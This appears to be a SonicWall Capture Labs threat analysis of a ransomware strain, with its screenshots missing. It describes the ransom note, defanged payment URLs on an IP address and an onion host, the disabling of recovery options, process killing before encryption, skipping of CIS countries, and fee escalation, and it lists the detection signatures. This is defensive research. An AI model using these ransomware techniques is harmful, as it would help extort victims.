d.bmp contains the image that is displayed on the desktop background.

 

GyQUfe-decrypt.hta contains the following message:

 

hxxp://217.8.117.26/pay and hxxp://4dnd3utjsmm2zcsb.onion/pay lead to the following pages:

 

The infection is reported to the same webserver (217.8.117.26) along with encrypted information:

 

Disassembling the code reveals the ability to disable various system recovery methods:

 

It also contains a list of processes to kill so that any related important files are no longer held exclusively open by such processes and can thus be encrypted:

 

Before infection, the malware performs a check to avoid encrypting systems in CIS (Commonwealth of Independent States) countries:

 

The malware states that the ransom fee will be tripled if payment is not made on time.  We confirmed this after checking back a few days later:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Exorcist.RSM_2 (Trojan)
  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.